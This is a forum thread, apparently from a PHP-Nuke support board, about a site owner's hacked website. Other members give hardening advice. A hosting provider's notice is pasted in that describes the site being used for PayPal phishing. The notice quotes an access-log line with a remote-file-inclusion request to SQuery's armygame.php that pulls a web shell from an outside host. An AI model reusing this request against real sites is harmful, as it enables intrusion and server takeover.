Author |
Message |
swisschese
New Member
Joined: Jun 30, 2006
Posts: 21
|
Posted:
Thu Sep 07, 2006 6:08 pm |
|
Any tips?
[EDIT: image removed]
Anyone had this happen?
Thanks, i don't think that the forums are up to date. |
|
|
|
|
fkelly
Former Moderator in Good Standing
Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY
|
Posted:
Thu Sep 07, 2006 7:26 pm |
|
There are many threads that you can consult here. Without further information there is little we can do. Nuke version? Forums version? Running Sentinel or not and what version? Have you looked in the logs? Any "third party" modules that let people upload? |
|
|
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6432
|
Posted:
Thu Sep 07, 2006 7:28 pm |
|
Install NukeSentinel, and put admin authentication on your admin.php file and modules/Forums/admin directory (search the forums here for specific instructions).
Check for any changed files, check your database. Change your control panel and nuke database passwords, which should be different.
I'll remove the picture from your post - there's no need to display offensive materials. |
_________________ I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG |
|
|
|
swisschese
|
Posted:
Thu Sep 07, 2006 7:49 pm |
|
Nuke : Raven's RavenNuke76 v2.02.02 Distro
Forums: phpBB 2.0.20. ( Not sure how to update )
Sentinel yes, NukeSentinel(tm) 2.4.2pl5
Logs, oh yeah, lots of IP's
Nothing to upload as i know of! |
|
|
|
|
kguske
|
Posted:
Thu Sep 07, 2006 7:52 pm |
|
What about admin authentication on admin.php and modules/Forums/admin? |
|
|
|
|
swisschese
|
Posted:
Thu Sep 07, 2006 7:55 pm |
|
I think it's broke...
My user login is gone... bleh |
|
|
|
|
floppydrivez
Involved
Joined: Feb 26, 2006
Posts: 340
Location: Jackson, Mississippi
|
Posted:
Thu Sep 07, 2006 8:05 pm |
|
If you can get into cpanel, here are the instructions to password protect your forum admin folder.
[ Only registered users can see links on this board! Get registered or login! ]
admin_auth can be found here (under Apache is compiled as CGI, what more can I do?)
and probably a few other places on the forums.
[ Only registered users can see links on this board! Get registered or login! ] |
_________________ Phpnuke Downloads, Clan Themes, Mack Hankins |
|
|
|
FireATST
RavenNuke(tm) Development Team
Joined: Jun 12, 2004
Posts: 654
Location: Ohio
|
Posted:
Sat Sep 09, 2006 8:49 pm |
|
upgrade your sentinel to the latest.... |
|
|
|
|
swisschese
|
Posted:
Mon Sep 11, 2006 10:58 pm |
|
From: [ Only registered users can see links on this board! Get registered or login! ]
To:
Subject: C54836102 - 1&1 Internet Compliance -- Account Warning - Hacked
Date: Mon, 11 Sep 2006 08:16:04 -0400
>Dear Swiss Chese,
>
>It has come to our attention that your web space has been hacked and
>used to host a phishing site at
>http://www.xtremeidiots.com/www.paypal.com.webscr.phpcmd=LogIn//:
>
>access.log.36.gz:86.126.57.95 - - [10/Sep/2006:10:29:41 -0400] "GET
>/SQuery/lib/armygame.php?libpath=http://www.freewebtown.com/k
>aizenngo5/hack/shell.php.txt? HTTP/1.1" 200 6255 [ Only registered users can see links on this board! Get registered or login! ]
>"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1
>; .NET CLR 1.1.4322)" "-"
>
>--
>
>The above was taken from your access logs. It shows that
>/SQuery/lib/armygame.php was used to perpetrate the hack.
>
>Please contact the developers for this script/application. You will
>likely need to install a version update and/or security patch to prevent
>further abuse.
>
>Also, reply to this email in acknowledgement of this issue. Failure to
>do so can result in your account being locked and possibly terminated.
>
>--
>Sincerely,
>Customer Compliance Operative
>1&1 Internet Inc.
I got hacked cause of a server viewier that i had.
Thank you for all the help... let this be a warning to all
SQUERY 4.0 game server viwer does have a big security holes!!! |
|
|
|
|
swisschese
|
Posted:
Tue Sep 12, 2006 3:28 am |
|
I know there is no way i can upload the 2 files that i found on my comp. but it looks like a method that they are using to crack the adminhttp.. if any admin would like to take a look at it please let me know and i will send the 2 php files over to them to help make this more secure.
Thanks
SwisS |
|
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
Posted:
Tue Sep 12, 2006 6:35 am |
|
swisschese, they got in through SQuery. Once "in" at the server level, HTTPAuth will not help you...
I would suggest signing up for the Secunia Advisory service at [ Only registered users can see links on this board! Get registered or login! ] SQuery was addressed here. An invaluable service for the webmaster. No guarantee they will cover every script, but just another resource.
Like I always say "your site is only as secure as its weakest link". It can be exhausting at times trying to keep up. |
_________________ Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more... |
|
|
|
|